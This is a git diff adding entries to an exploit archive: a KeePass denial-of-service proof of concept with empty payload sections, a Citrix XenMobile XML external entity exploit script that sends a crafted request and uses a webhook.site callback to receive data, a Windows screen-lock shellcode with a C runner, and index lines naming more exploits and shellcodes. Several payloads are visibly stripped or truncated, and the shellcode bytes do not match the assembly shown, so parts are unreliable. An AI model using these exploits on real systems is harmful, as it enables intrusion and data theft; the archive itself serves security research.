diff --git a/exploits/multiple/dos/47952.txt b/exploits/multiple/dos/47952.txt
new file mode 100644
index 000000000..826ef9c12
--- /dev/null
+++ b/exploits/multiple/dos/47952.txt
@@ -0,0 +1,109 @@
+# Exploit Title : KeePass 2.44 - Denial of Service (PoC)
+# Product : KeePass Password Safe
+# Version : < 2.44
+# Date: 2020-01-22
+# Vendor Homepage: https://keepass.info/
+# Exploit Author: Mustafa Emre Gül
+# Website: https://emregul.com.tr/
+# Tested On : Win10 x64
+# Description : The free, open source, light-weight and easy-to-use password manager.
+
+
+PoC:
+Open KeePass > Help > About KeePass > Help (any local help area) >
+Drag&Drop HTML File
+
+Save the contents to html.
+
+
+Payload-1:
+(DoS & Run Cmd)
+
+
+
+
+
+
+Payload-2:
+(run iexplorer.exe & download infected file)
+
+
+
+Edition Mode Active
+
\ No newline at end of file
diff --git a/exploits/windows/local/47950.txt b/exploits/windows/local/47950.txt
index 5d9e87f28..bb8dfa2f3 100644
--- a/exploits/windows/local/47950.txt
+++ b/exploits/windows/local/47950.txt
@@ -157,13 +157,6 @@ chunk_sz=5 #number of bytes we must decrypt the password by.
#Apparition Security
#===================================================
-def haslib(lib):
- if not lib in (name for loader, name, ispkg in iter_modules()):
- print("[!] "+lib+ " does not exist, pip install "+lib)
- exit()
- return True
-
-
def carbonftp_conf(conf_file):
p=""
pipe=-1
@@ -325,8 +318,6 @@ def main(args):
global passwd_str, sz
victim=""
- haslib("clint")
-
if args.user and args.encrypted_password:
print("[!] Supply a victims username -u or single encrypted password -p, not both.")
exit()
@@ -380,8 +371,6 @@ if __name__=="__main__":
main(parse_args())
-
-
[POC Video URL]
https://www.youtube.com/watch?v=q9LMvAl6LfE
diff --git a/exploits/xml/webapps/47951.py b/exploits/xml/webapps/47951.py
new file mode 100755
index 000000000..b8b331b85
--- /dev/null
+++ b/exploits/xml/webapps/47951.py
@@ -0,0 +1,47 @@
+# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
+# Google Dork: inurl:zdm logon
+# Date: 2019-11-28
+# Exploit Author: Jonas Lejon
+# Vendor Homepage: https://www.citrix.com
+# Software Link:
+# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
+# Tested on: XenMobile
+# CVE : CVE-2018-10653
+
+#!/usr/bin/python3
+##
+## PoC exploit test for the security vulnerability CVE-2018-10653 in
+XenMobile Server 10.8 before RP2 and 10.7 before RP3
+##
+## This PoC was written by Jonas Lejon 2019-11-28
+ https://triop.se
+## Reported to Citrix 2017-10, patch released 2018-05
+##
+
+import requests
+import sys
+from pprint import pprint
+import uuid
+
+# Surf to https://webhook.site and copy/paste the URL below. Used for
+XXE callback
+WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"
+
+id = str(uuid.uuid1())
+
+xml = '''%j00t9; ]>'''
+
+print(id)
+
+response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
+ headers=
+{'User-Agent': 'MDM/1.0',
+'Connection': 'close',
+'Content-Type': 'application/x-apple-aspen-mdm'},
+data=xml,stream=True
+)
+print(response.content)
+print(response.text)
+pprint(response)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4978c08e6..cfe324f53 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6660,6 +6660,7 @@ id,file,description,date,author,type,platform,port
47937,exploits/windows/dos/47937.py,"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,
+47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42251,3 +42252,4 @@ id,file,description,date,author,type,platform,port
47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,
47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php,
47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java,
+47951,exploits/xml/webapps/47951.py,"Citrix XenMobile Server 10.8 - XML External Entity Injection",2020-01-22,"Jonas Lejon",webapps,xml,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index e115ce87d..621d1bf6d 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1012,3 +1012,4 @@ id,file,description,date,author,type,platform
47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux
47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux
+47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
diff --git a/shellcodes/windows/47953.c b/shellcodes/windows/47953.c
new file mode 100644
index 000000000..7807aa510
--- /dev/null
+++ b/shellcodes/windows/47953.c
@@ -0,0 +1,31 @@
+# Title: Windows/7 - Screen Lock Shellcode (9 bytes)
+# Author: Saswat Nayak
+# Date: 2020-01-22
+# Shellcode length 9
+# Tested on: Win 7 SP1-64
+
+/*
+***** Assembly code follows *****
+xor eax,eax
+xor ebx,ebx
+xor ecx,ecx
+mov eax,0x00000002
+mov ebx,0x00020000
+push ebx
+push al
+mov ecx,0x77661497
+call ecx
+
+
+*/
+
+char code[]=
+
+"\x31\xC0\xB8\x6F\x86\x67\x77\xFF\xD0";
+
+int main(int argc, char **argv)
+ {
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}
\ No newline at end of file